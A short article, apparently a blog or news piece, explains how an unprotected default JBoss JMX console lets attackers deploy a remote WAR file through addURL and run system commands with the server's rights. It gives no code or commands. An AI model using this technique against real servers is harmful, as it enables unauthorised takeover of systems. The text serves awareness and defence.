Hacking JBoss

JBoss is an open source, standards-compliant application server which is based on J2EE (Java 2 Enterprise Edition). Being a Java-based application, it is generally platform independent. An application server written in Java that can host business components developed in Java. Essentially, JBOSS called as an open source implementation of J2EE that relies on the Enterprise JavaBeans specification for functionality. A flaw in the way JBoss, the open source Java application server, is configured by default gives attackers unlimited access to the system using only a browser. Access to the Java Management Extensions (JMX) console is unprotected in their installation, allowing attackers to gain access to systems with the rights of the JBoss server. The JMX console configures Managed Beans (MBeans), which are Java objects that represent certain server resources or application resources. This vulnerability allows arbitrary web applications to run on the server by linking to Web Archive Files (WAR). These files can be on another server and be deployed via the addURL function. Security service provider n.runs has published a description of the problem showing how to find a vulnerable server and connect a WAR file on a server so that the file accepts system commands and executes them with the rights of the JBoss server. In the standard settings after installation, access to the JMX console is not protected, though the documentation provided for JBoss explicitly points out that protection is still necessary.